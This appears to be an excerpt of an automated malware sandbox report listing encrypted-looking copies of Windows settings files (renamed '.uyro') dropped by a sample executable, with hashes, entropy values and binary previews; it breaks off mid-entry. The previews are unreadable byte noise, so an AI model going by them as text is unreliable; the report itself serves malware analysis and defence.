SSDEEP:	192:qQ9LZOswNGYbQCEMHlYL+UisSlxt2xrH7Lr7k2:qQ9Il5QCEArzkx/LPk2
MD5:	43F59DD609768BB04AA02CEA4EE623AF
SHA1:	84ECB74FEA55318A6A480B087775B60E82771FFF
SHA-256:	F6E549452C840BE4AED30BBFF5B0C8B85F8A944A4A6ACAE7F62CE6649828D5F9
SHA-512:	697CEE66D80B9BEC9B64DDCCA609CB444768CE1E08AA8414DE4134F6A0C7CD58A23E80E25F0B8BAA8999C30BD8B71F68342A36C377632AD5B3FE979F5326E4F5
Malicious:	false
Reputation:	unknown
Preview:	regf....5.A.{y.... ...#h..N..\@.XB.q..u..z............9a.!6>~....6...2.s..#@n.V.u.....f\|.E.xS.........L%B.C..{......A .V........83..D...u5..\|:AP....C.`.bkK...b...X:.....8DX.z...>......3.-b.3..ukz..-..{...o...LB.F@o......Y.(R.cwL ......Z".#...O.%g..Jr..../.....N....`...u%.bu......m.0c.;.[b....w.A.6.}...u.H:.V<...........]..X#.hdX..3..Y....!`$.s....NhK;/...J.7.O..L..Z3..h........=W7P......W`t..qD.w.XA..q\|.<I.jj..<.......mL.7.k0<..u{............i..d.kt..g.?KN.v.Q.P,....<...L...c(Q~..^.=......7.p.U.IXn.4.^.JU.]..h@fD.g....fAH..^9.}>.D.......\.e;.....I)<..\..ca.o......y..x..D.{........Im].0......w..s.\..k.Q...4E~.3_...^Z.N&.b)^N...$b]X..,P..........0.5.B.........VUX.Pi#w.\|.....5s_..".S...>.u[...M._......\|....v..xk=.{.s..3..]\..6..R}nU<Y..b.{.;..L..Z.*.W)4.......2.b#.GF...uLV)hm...q}ZVj7.a..v.A.NN.`....!.._.zt..Q...<..v.L...2..a....ww.G..m...W.A...._...%..Ie..-b..x........Q....5.Z..s.9..`.s..R..eo.i...m0....\..3..nn.....2Yp.q....T..._...x..%...F.y]a.

C:\Users\user\Local Settings\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975516375776632
Encrypted:	false
SSDEEP:	192:xhI1l11g0cxAkYgoJPI1kHma3kjhjx81rGwdyoqALxJRY:DkgdWquQ1+kjhlLcOARY
MD5:	E2D57BA46D539ECEE91075B2CA6A473B
SHA1:	2A7DCEB0F27F1192124B1BEA24271BC5CCDC99B7
SHA-256:	7319726D777B5BB50C591692A4950774D622180527E938210FC21E4FCCE744E5
SHA-512:	82D78164F6BFA4A6A801DCB13C7B8FF297657088422A94C225688C76ED5E70CF022746552743D9376AFC196A5239792127628585F763645054609D3502F15B5F
Malicious:	false
Reputation:	unknown
Preview:	regf..Lc.l.~I.ajy...Y...f....D....2..!.\.;..HR<.A[..x\.PT.... }..U.N$<.37..o.T8...............m..........}..d...g]...N..&c[..En.9bW]&...I.....?.ar.?...A.d.^......{If.....3.y.....UX........\.nn...x^.^"....S.`y.?...._..y.Ma..L..Sk....1k...d..]...Zo......:x.0'.UF4....(G<hU..A......#.&.9,.v.D...ACT.......a....P..-.a..W..S.$4o..'....`A..V..r....'.1..dv]r?d..c".5.C.j~.. ......\|o......Scd.Y#.gDO(... 5v.*d...1wO.....t..K......4.,......v.....Nx.......s=....C@...<...)R...P....r.....snj.F..Ga..^9Eh..r.......z.iK........d..J.T..<n.'...b.b..Bf...i]."..7....`...IL#b..q,.'..\|>.0.....j.8.......mszA<M....f.5E.....)0.d..}..vA..W.)..'#`...\.fu.v{.../.x.H.X..O..,4.(..u#.u(S....:.R...\.........lk6m.m ...CC..'....).u.r..u.G...9.....'...G.4J.!..\..._.w.L.".......7U.~....b.`._..]f.#.U.......S.....R..NA.c.cJ......V.U..z.D..]....E.:..@.^...K-..^..0....P...(;...w\^.9..1.nJ...;..v...G.....@].U..H8...Ya.:.....+.ej.o.`.@..... . H.pG.{q.........Tm..\..

C:\Users\user\Local Settings\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975818291614948
Encrypted:	false
SSDEEP:	192:/zreFh1C/+681wKkjcEBo7z1KbaSVZ9LNCDJZlXS4:7rE1f1NkAEBoPK1NyS4
MD5:	402DD1F3102FA7E7AD19E57DA19C9EA2
SHA1:	0B5A86A31FEB70724A4EF3FDD595CE7BF1FE9B47
SHA-256:	E3CEA673646EDE78D257443FD1ED8E4B85A5AEE80639FD0F0631D7A09FCD4C8E
SHA-512:	FCD65ABE9939D62D5F92C45EC5DD8E14FC9BD2A6A0E927591D79A7496BE8E15BD7150320C52624B0C37ED181BD6CB64A6EA1B16CB253A5EBF53FE59E8F2BA33F
Malicious:	false
Reputation:	unknown
Preview:	regf.......q.PXVi.M.#.us.qi.cW(BO..?.h...g......d.cWp..u......\|.KgA{..t."K.T....y/J.&..s.$....\|.F.[q3Fr.~5....v....C..~i....^...i.=c?Z<.....b.......+s.o....1d.h.j[.D...?..e.\....Y.....i.d.Z\p.....n!8....f....h..9........!U.A......."D.b.V..kQ...}.r\|-.)o..L.S..>.......y.a.S..[a.C...,....D...i..Uk.s..#m....{....io...T.k....v#5............P.x...x..T)....4.9..%....sb.Fa....1./......9...T.L.&V..yA....%.O...B%.QK...km.p5-...!.C.B!Po..x#hl...>..O.6.s.\bu.;.K...q.....qA....l.A.W.Q....r..y..Q...?.z579~.....#=G{......`.:.Z."m.($A=......z.C.IS..b...{..b..I.m.....Y.a..ZX..(......8...c........ef.t.LC0.@...Q.^. .6.R..*."...c.....$../.1..,~~..oA..<..4.J&......je.3.$..A..7.b#..q/NRH0.......y..u`...m.D{.8O......../o..ng.0h....U_.2.g.:.g...Q...E.../WO^...3....6cG>@br2.+.m..u......^.-..?U......1...Bk..DhE2_.>HK.o.W...N4.t.W"...R,..&)2..P..n\|5..g~..^....o.......I.j<_ >])F..(...W.....p.d..Y..4v.9..[T..9..\|2.N.2.Dk.."...<F.6..b.....!.<...[.T..@{..A@.#.....

C:\Users\user\Local Settings\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978554608200949
Encrypted:	false
SSDEEP:	192:gQvYegB6HdkCW04LiI1zDfiaR2xthbzif4tjxzUiVtEl8g:1vGvyI1vqbWIxgB
MD5:	9A75C955C03946A1BEB021F54F470A92
SHA1:	B1E975B92024E5BD73EF8382FE4D98C6FB0CB30E
SHA-256:	A2B18485A2576F5C22CDC5011454C414A2F7419A9C26FD72ABBC9DF9F1ABFEA2
SHA-512:	7F13E8DEC250B70D1A0176CD4774448D933AF2CFEE72C773E939B6FB7E40D664E51917DABCA258C7D43ACB08B2E010E5AC49920D3CA67A62A01AFF57DA93EF6A
Malicious:	false
Reputation:	unknown
Preview:	regf...8.\..A.u......l...F.f.Q..A.a.<.....t..613.0V.;.....T&...&Ge...4..............?.........&Ah.qb.E..c..\.'...'$=@.@.+v.%w....c.Q.P......@...O..-.n..L..2;....l6..5.........*.M.7.u}..{.[8..........9....#PgB...i..Si5........b..n.O`.F{..@ysZ{vD.....T.....KR.\|..GE.J...\.-J..3.'[......r...\....d....$.P8.=.. ._...iX...[..c'T. ~.L%..N[...g\|........p`..q@i.g.....,T....I..&.q..Ce...#...B...p...i...5.....%D..r.......{.}s.V...W!..K.:X.5B.C.k..........QD.S....]..;.;.4.gW.....&..g.....[Edo..`......$j.l..G......=n..t......x...{....;A..Mf..O....+...>OW......0.....g.wNu ..62.>B..E...>.........>...p...p.C...UdC..0.[.,...o......Z.._......+....o...!.77..>..........y.6...oB...g.PnRb......1o.&.CW..4..?...~......s(..1...x... w..&A....5.!E{.....o..&!"c....Z.....MP...RT........((....@.l.....j.7..y.D.I..B..4.}.......@.U..Q.._....H.v}.....eq.A......Hk.j#....)iCFC~..RP..?.l.?........y.ej..)@a.t....0.....j...=5...\<..=.....~{....y.1a.>..._..5.X..U....Y...;..._.....&.

C:\Users\user\Local Settings\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978961823812703
Encrypted:	false
SSDEEP:	192:vuGmDGNg54orDzsv4aRfZM/MaVw4Gshgu+1:vu+gyo7dacwdshJq
MD5:	D71760CA1C9BB4A1CAAA4FCDF179D7FD
SHA1:	A17405C52A36D968A971D99C1BE5D1FB43C95C33
SHA-256:	65D30AD6C49C4FDDC4CE6E648086DBD45BC95DF77D2973349EFF5AD66C13F9E3
SHA-512:	3BDB21AD041603308ED8DFC23E057B7AAF1EA628ADAA8112948E29BD702B8A3B02B00E96D3A74A777062848A96667A058BFEC4E3E0F4BB115401595A875EB640
Malicious:	false
Reputation:	unknown
Preview:	regf.X.....:/...j..h...G.)....t.W..oH.q,\3.Q..yu....!....y.q..7.C# ....).3{.h.T."..,..k...N.\{..c.~..W@R3..r..>3..)...>..J.I.(i[.WT.Ae.h....zz...o..m5.k....J....j.}'.....g`.1.O.o...Rf)P.$.E{.d_.\|..~...ko.`.\|P...j..(.!N.....F0.Y.......o.....Z..9....5A.....G.1.y...p.k..;./..}@.O-.bJ..'...N1n:...2b.Lbl.R.h...V.S..`y..\.U...M..N.sb..ySQ].YVJ..K<.zM...M..Q..23oE.....:.6.....P/...vB.....=<:[.J.I.+..ZO.)..V.rh^.!.+..z.:.}...P.~X}..{zJ.L.H..G.....Q=_@.y .e.7^.....N@.~i.l...>}.......9P.X......F..\.n\1v.......5.4.n.63......(...F7....Q....#....6.........]...ai.........I..0.\te."...]p:......<M.:..R"C..[...P]...!.e6..1.#z~.t... &l9p.<{@..91..rA).V....$1[.....e......5QX.d.....9wD3\N.App.......Q@266x...(`S.i..J...l..q..i...E..+.IK..8p...E..$!...>J..:*2Vge..LV.{I^..8..cP..c......p.....1...TUt.b$...........yu...I........`kS...fX..l.DVp....F.<.........<.,.....z........r..p..g.....f.S...Y#...f..SBO[....W(iz>Y.E\..y.......{...@...V...E.mE&T'O..B.i......

C:\Users\user\Local Settings\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9766173601129555
Encrypted:	false
SSDEEP:	192:QygfX38G9P4hNjGfbGQUAkHUo7QcYsUAxTY4XgiLsGhL0NN3M:Ngf8G9AhAyHUWQD8SWsaQzc
MD5:	650414CD25DD26812B21DCB62E9F18B6
SHA1:	8AF427066A5373B27FCC8FC49F543AFDC0E63B84
SHA-256:	4802688108B6A66F5FB72702607D4C6FEC8C2DA30086BAE12CC1F568772F8F6C
SHA-512:	BF19888ADB94E89D21C96F95761C396388965432B2176FF649F7B2FBBA88B8A2AC2C7769033D94A293344D850BD8D68D3A33DF15E2323F6C9BEBB183B71A6D1A
Malicious:	false
Reputation:	unknown
Preview:	regf..:.L..F]LT.y..H.n....#..5w.(.e>po~...i...a........-..7.S...~.}....a\z.6...{...o....<.K.TW...3.ELk..)Q..N..d\|..T.)....U...3@...N....oN..?Vj..Hs.:.ue...V.p..H..m..ib.%..8.c...c...L..+..o.:(...\9..nr\|.2...f.?q.L.E..f.V.F.6.-u...e..5...5...W....HIM=...`.z..h.X..Fo.l..a...4.W.$.K.N'8xJ...h......rA...b.^.......a.X.S...v._....g....y.O...2.my.>.U..[..J8..y.-f.hW..._L<......$...Ph.-f.JW.YM.....\|.Sp@..:J)...--\.2Y....75&{.....3...6.....Z.O39..>..3..T,...........c??..#E.m....]v..J.b-tT.F....jY....fw!O.a./....8...I..L1...$..#piJx<}....'MV.......\,@9.......C/...q.h.x...$L...M.....s........3.xM.....\..n.`...q..4.i..=.......^.\|.....s.t....L..J.iR..S.nJ........2......L......!......I..9...e.Ql.+S./.5..x...&:...C....}<..../.-..E........pK&..\Zh.j......]...>lz.yc..y.!........H.}...-..q.d.B.0I.....)(.a..X.dX[.h..P..(.{O.wf.)>.Y.n=.......>..\..-.-..........$.......K.C.L.(D_.R\hP.C.HI.$...0Z.@..#S.a.7...D.K%.6%\qsR.d.KC..z6..w.M[(......12:..l.

C:\Users\user\Local Settings\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978515853296214
Encrypted:	false
SSDEEP:	192:r+QpNQHhmndpDDqGi/g1NFOxhZXwROx+NUv1UqM6LJW9EB3:aQDQIn/qpo1NFWvXyOoiUqMkRB3
MD5:	44BF71A0F6F3C843F7E09D7FFF412299
SHA1:	96C1EC64D0308C0B020DCE09317753110ACC8E6A
SHA-256:	89B474141B1DD06CDE5C49A100DBBF6297D875A78803E8FFBB8FE1B18E277CE2
SHA-512:	DF965A8E15625F6B5AFE69E79084D2D7D4B4451F51B32E6913725B888957ED8320A6B7361917E3890BEB093A369540EE0A9921205FCE05A1B82E3CF66CB9D303
Malicious:	false
Reputation:	unknown
Preview:	regf.82.rm1Qn[.k...R.%7ljW4..9.+.P.L8v.4..?..1....cG+p...vTw..'..{.mF....~-.jd...M..........}...a=........r.[.\|<..=i!fZS.....pN.x.V.~....(.F\|L%..h......k.-...8.C"...)r....k.....e%a7.f.....tL~......mJ.....\.M.vp...."V..!>.3.i}..h.P:.F..[..&H;...7)d.......u9....[M,.\|..K..~..Y#^E.<I2A(.T..f.>..;.f.N.xA...y..S"JW.X..(......>.(mX.._.EFB.1....'.... .ih..".Y.S..U..b5D...96~.GL.....F.G.w.G>`xU..rT.\......Z..p.d.x.M.+..X.j....^].Q.v..>.0..+......%...%..b.<.5..Y...e..Gqr....j...V.l...f.p.;.;...m...<.`..x3=....X..z1&.CI......T....4).."g........['..c...Av.' :..:...[-.Th.FL..P....U....%A.+..F.0#4...7go..:1/..J..<O.sX...$.~.8.q.~nk./(RwO..E..j.\|.n\|.$%..f.Y.B..N'....w.n.>It...y....Q..&....^@.y..w....,........}.._h.QeQ,..l.=.D0.M.,.I&.{.:.R.t........X.6UP..?O..8.k..4:{..j.)...s.;~.4Z.M?.<.U.....jO.pY..}(8.n...U.}....`......3.....1s........<.l.*...Sj.ES.g..H.].S.....2.. '.B.....EIOPU....r.].......3...UO.....8.,.$..?v.....X...e..g....4..E.....[eK.

C:\Users\user\Local Settings\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.982005364928784
Encrypted:	false
SSDEEP:	96:wPDKAzgcCI0XD7AESdbqaJ6ZaabFVziJrFBgaZYLcweqMIwVcE5mmFGFRaaLKvNg:gl6XfEx3wP/zihbgq+MIwOETALwGvGU
MD5:	D6C9A9EA58A8A1557C0B33DA66B501B1
SHA1:	95E97D36B896A99D9CB08089AFEE07DCAD797510
SHA-256:	BF4204D55A28C9A9D30DC93E6189DFC0C65130B982E6758965D66266A00BAE9B
SHA-512:	5C1D7A1291861349CE7830DCE1C64C2F56C954EB16541E8240F5232247176772FD82E8F16BF2E53675570F803B4EAF045820AE6AF8CFEDB63BB5F1B45E7D0D02
Malicious:	false
Reputation:	unknown
Preview:	regf..}..l.Gat..I..~..?.5........../.....y..D..TMx..^..<.#lk...E.J..I.Z.U=7..Va..{.=y.aC.\|...f..u.....6.=..!"e...I?`.<..!.'1....L\{...}....9.W..TT>v.mA..._.Y_.'^oK.^.^..Q.c....}.^w+g..=.'..)....,Y.M..Y....[..<.@.c..K6..iu.^>.-...>.Yi.8 ...=..]Mk.PwW..hT.9P........<k>....S:+4.d8....A<-.".d....G^Q.@."....09.3%HEr.=].R.-.c...$&.o...:.f.(}..Q..5'M......B..G^M.~.....`..a]T@+...A..O......K........q'A....F.o......t.2...bZ$%37B.E..~.....Ir.c..l.3/%`C3.~.Q%.....fyD4...(Bq...H].O.....N..~tAm.DgMTy.V..?.x^.zH.....h.k.Y....3$..q.2.`s..........8....8./4..1.:...@..x.P.....?.LPn..H.......>....Q...^.R.o.....#z......P..W...uE..c..k..!1.h..0..\|.].c.PhY.N....C!.........a..Y.D..1..!.X.....ub.{.(SB..9D.e.!T$=.;<}.g..iH.ua.X4k......k".4h..G.~w..R.....M...T.O;R.9^...1#..1=..P.`..O...`.GwH..E..G.A....j...K..'pae@o.....C..96.C....2G..Z..l^<.e%...~..>...8..LX..3.........F..._.s`..*....PG.D................"X..o.n.b_N...@.ND..L.)0....V....+..q.s..`.u......\| (..Z)....

C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	24910
Entropy (8bit):	7.992977385144303
Encrypted:	true
SSDEEP:	768:yN4HjZTmbB0kSBZtWLsIHMBn1IwBQiwcKT1:yNolTe0kSBZoLs5VBQfck1
MD5:	BB7E4CA890BABA2F6960D10C7857C2CA
SHA1:	194D60ECF72CB9715542672301AAE356EF3E05DC
SHA-256:	01F562333793D5F8CDB036840F4886D42242FC2B4C8B65839E02F9C5B0680CD2
SHA-512:	010703AF9DD322D4BFF243A47A6020E895D2424826E2AB840C5D07F6CA89A58D7AD154CD4E54C0A11D7F82ACB9599218AE73279B0C043193E3C867F0AA8E05CC
Malicious:	true
Reputation:	unknown
Preview:	.....5t$.t[A...~..]...4...7o..K.@P.0T..]a.....=$.p.%....(K%E...'.<....I..].HT.........(\....Y.s...^t..$.p....&Fc.....9..O..&.e.}x..ulu..%._..] ../..T4....iB....S.ZU..k2.z". h..lt.k.d.9..i..Nhu=..k..od.........^.9.....x.0..!........Z:q(.Y.....<..yrk._:i.3..[\|`......i..G\|.'...........G.YM..8.AR......?.Q@..O...C.../.>\jy...a...0<..D[`.:.@....h......x.}..cg...w%.........9.)Ax..S.Z.m.U......C.....(.7...o......X.A.....1......m...k...n.ym..t.T..^..K.W....'[./.(.n..ei..%_............e@...a\.@..iR.L\.....,....Ur...1.p...?..t.c:x...2pe....g.nm..d..."..A&..Q ...\|T.)`].]...(F.......?..x.N.O.....m...:_....e...H..@.4..E3SP1/..q..F.[9....s..\..E<.q...M;.....z....j.{h.....n%.....pF9...Q...9.............}x.P.<x.2C.......y.+=....n...3.9U....'...X..)]i.8Y`.9m...M.y...x..Z..Q......[.$.k.I.S.....6...K.."....n..v........[...3.d.....Hy....e..J..\|...r....^.........(knF...7...1.@c>b.[..hca.T?.Z4....%.U.q?D..y...S..kp.7.q.......S......h.._.I.cuZw$

C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.98200469072384
Encrypted:	false
SSDEEP:	192:6R9VtgECPd7QxticWMBfOZjzsLzSZ5C+qBlzzibjbHk:9ECPSUMhezdZdy24
MD5:	EA260C2001EA7C43D48E67C62CAC5991
SHA1:	F0157594EA08B4A367B24BE2A0EF47587B53FD12
SHA-256:	1EEA7DF0C967341E2F69094BD4E6EAA6B4D11F4CF12713FCF2980FB0E6EAA11E
SHA-512:	99FE87DF0E49763469696AC4B07121FF4FEC00E8AF9A56D9329CA06B12AD067A8B46A62316929E6B775C04DB7459D1A7A9729DD390D20732BB1A318AADBFE118
Malicious:	false
Reputation:	unknown
Preview:	regf..y..../.Y...(.....Y(.ut...z.._NPN.:...)m....OT...y@.l_.pp;.t..L..g"W.o...{.E.,......C..qv.$.G.7.;\G.6.....gg.#.....].. M.1.3.....H..ve.........K.6u....s_.9.x.4n....ucV.S...LPl....,^J.X;...\|....7.....;.v...\yLfwT.jb..z./...e..H..I\|...q.=n.c:.,2..[..1\|.)......`.....0....k.eN....gwE....m.!o?..7.....\Z\...n6?.@.z....K=.3...}...{.....\.4...Q.O.)..&~.....0o..! .ob...aP5....m=x........l:.=.[+p.....\|..7...#...`g...xh.g.z./X.K.S...s......f..$.7..2..kR#^..J.f.u.fQtH.......>.^...b.....UzM.'.x.c..FUzv2}.b.TwaZ$P..W..L.1=...:D..._t....O..!.I....?j.foL\|9.....+.Xo.i..........pR.`.\..v.....=.(y.r.^.?......{......2(.H-.AUb....-.B(.qV....@./........CS...1.c..P.A.#.X..9...)._N...Fse.T]0...L.......X..........j.{F..h..U.>R.-....Vb...H{FHh.......FW.L...rd)....sf.U@..C>....NQ.eH..s.Lvj).y...$.f....R...=..>......&.]Q%_pD{'Q..26h.R..0k.M.0.%{< .2>.0,.]....%. .>%...At..[.n...W.C...SC?......,i1L.[...gB3....b.T..%Pz.\...l.....l.0..,.C...r.[E_6.....T..a

C:\Users\user\Local Settings\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977457825403469
Encrypted:	false
SSDEEP:	192:S4UcMf4n+rQKxWqGOjWbxJG0ckC2qStsriVghOLjRPuOqO:S+s4nsxWqdcikCSsaGKlPuO
MD5:	347A951BBABCDB9634A4A0E5C9051E51
SHA1:	C7BB20EC3BE219EA24BDAF680576DE2397FE3A0E
SHA-256:	B2383FD14CDCBE164B5FF1C12F603CA8829983BE9CA94DEEDECA37A90D9B954C
SHA-512:	167C8023214DA0089E9AB01D949866D0FDBE84AD1C76D289BD203CCB0E585EFF7B4CE2D5E8E2C2301E9DA4AB4E5391D4D5549A103CBC0978DC7A2029DA1A7C30
Malicious:	false
Reputation:	unknown
Preview:	regf..A......].H... .D.O"..%......+(........@G.).[...].)"L.......<../Y......!.W.Z4..WW+@TD.@?o..c..U.....y+.t.!f.00...-.M.>..'.h3.>...ha..i&.X.........9,..sW.h..../2>{.f.g.K.}..K.Xo.b....-B_S..-.#....-uc8......:...]....@P.u..I.+...YFx.......2.W..[:H...'~.k..x$......../.m.q.d.A...0.....?O.\.z....Y..]....^..[.S.%.. .6..~6.X1z.f...!..W].....!......~.o-.'I..7.X...V..v$.bN.@.......TJ...N."..%......Zq..s^..es....%y....G.T.9.uw..a.Q.(N.<.Ry...\.+.b.vZ.......\....T..>ij..i8.... ..K..)`S...}i.%'a.NR.z1.....g....=.H.O.....X!.UK...s{..'.x... Xv7..sd.dp....El.f..N..\.99A.mH89.J....3.."uny......N....p.....P..*.T...0Mrw9M....,.:[....K.0i.h>.-.H.`.\|..W....qr.....<..+.y...E;.....:M...[..s.........S.....9....a.......v..rd.>s.2.`/C.....1..sI..5..z.."o6+f!-....]X.-B?l.....3.kE..........g"..Ysk4\|...]t..[.3/..d..).a.HkOgVG.(S....PS...v..Rf.....8....V`.1..>FK..8%...m....$....z...Xoy..4..3~..........b.}@....5.^x.2..B..k..V.I.....5......N.i..

C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978763569359822
Encrypted:	false
SSDEEP:	192:VhA99ju1hm0i0xm0Z3swgLr2i8N4DgvgNIPc793wWk4wkn:VhA9eFBxm03+P8XPK93wrGn
MD5:	F995CC5F7484C16F8D7FF2BD13B529D0
SHA1:	E840165E28FDA560C6C2ABCF8C7427C974B4F968
SHA-256:	B9949C4B61449287B4A5DB699321C872FC99DFC3EFB71205CC075C7CA939F63C
SHA-512:	CF3FFE00279E9183E1558A40F64D6116559DBD5BA8F9CDF08D16658A559FF02D13CF9FFEFDA7B1A743192DDFD7F9F7FD094E177C795E538ED088B1D8B84CAA84
Malicious:	false
Reputation:	unknown
Preview:	regf.K9.O./H...YJ.......;..yQ+..X....2......Ig`wz~Go.....1..[;Y...._.p.....%.W..*'....MuO."......U..B.u..!.OD...M.x.%."H...)p.H..E.kx.~../.TGc../PO;.A.....SUl.."...............@.....C..D.."..i.1...O....v...V.K...U.-..g2ZI`....2..F..f..y.2..QD.D.L..8...yH....J...A...0.=1g..{.bi.$....MB.J.:S.h..>...}]W.Ph...._...{.2...Dw.....:R.y..XC.{xe.5A...(w..O.$...-BY......lgW4.....S!. O....o....@.b8.....f........<).`.#.../.Q$.H....0!..S[QT.0...$..~..O..`H.).mX..M.2..r...d.....?.f...N...@.r..Q@.q.0S....8Q.@Q............V.i..Q`.{.?.....N......y...v"..s.nc.;...C....aB.J..;....'...K.\|.=_..XA.4.....{...`Q.p...W}k.........0..5.!%.2.d.{.=S..(.>...:(.0+..C...B.>.u4......ufk'z...'..F.B..K%.kW}....E...J..k..R.g!...b.h...D.$..W.8=..\|..#...61=....m.d.wI".hL.....S.....O)-..C.T..R..$#............dn..(..kI..Zw....6..ct......e. ..u....3.U... .^.).z.}C...W......h.p.s...")Or.........hS...J.n$B8......G.Ul.Id.F..>(...h69..RJn..&>.]yU.C..>fRwz..-..a ~..Y......8!/.!.._...3.

C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975498082852337
Encrypted:	false
SSDEEP:	192:YGy8uEm7Hqb32FtvivEH/f4mLVGBVGfAtxJD:YGolTqb6NiQ/wmYTGED
MD5:	647533500BA4825E6D46AD1E268A8FDE
SHA1:	475867AE16344F4447B9D93183D8BCE4EF090105
SHA-256:	3282AA4EAB7AF74AD5D8D81191DB9452399C0B4DF761B96519C610F44FF9E906
SHA-512:	B817A3A7B98A3DA554778933F3231C9E9D670DDCBB8749901890A09F326D9D75B26DC81AE5391A309B50119D9EE78F74D69BC7BED27E902AC58C5C27BBF98447
Malicious:	false
Reputation:	unknown
Preview:	regf.s..`[!n..:..Y.\|.. .;8.0Cz..8.........i.1."\|bQ.v.._.2...X....K+I...02.k.S.L.7.._.I......Ms#Z...J.......$;.l......7Rf2...<.K..T._.._......b.....`..8l8.PN.v..9.Yw"...jz-.P......?rn..R...@.D+X...B.O..v..fz?_..d..}.u......@....[..7!..;$..b??.J..^#.uXc.......F.....nl......-...)..#0...B6...T.,.B..=...F.31E0......I1.i%...8l4o......sV9...S..f.;....g.....u^k1R..1T.[.^......:.X.....r..@..^.T%..!.l....>r..k.2fB..SS..\|.\.v..c^V...dv....mn..b..`....T....#G.I(...@..s....nw..L~.....cc......i..y.......".....:.......P..e.Y.7.d....8.... .........5...I..3.V\|Hk.E.3.C.m...p(.p..u..,v.7.l.`.-..J{.........k..$.D...0...G...G...."dJ.n.Ey..W.wZ.w..1..H.?..Wv...p2..$....[.../6..85.......r.JJ .y.u.a.F..s........i......-..;..C..3)<..`.-.h..=...gR.>...q....'78x...d..X..=B..y@..@a..M..."V..TRyOKe.............5.. ..}...g4`.{.l......F2.H...zB8...@'.!...r.8.Z....~..............r.4....A\|..i.....I.6..7..~....]_...-M.....xO.....vL......-k.".t..0.....r.....066Y......#..!A

C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976675660714134
Encrypted:	false
SSDEEP:	192:kwlvU0+zg9A27J4EuivCWDCKxtmNbC0GG11MdFmK:noge27J4Evq4CKxt4r1cB
MD5:	5F549AF051F1948DCF86688ECC4A0DE5
SHA1:	DD06CE86CB0F593B7B71CE92FF0257BB5FB5BD0F
SHA-256:	9D12A5A2E8C097F862985FF6022EEACFB2CB22673EFC914B084CD9CDC08380DA
SHA-512:	4D9AC8AE83A4F38A089C367463A3147AE41AA0D0251BF1BC818B2B41E89829BB6C29ADD5085694EB7414308126FEB1B9A740DC72086E5A466D5BDC01376FF3C3
Malicious:	false
Reputation:	unknown
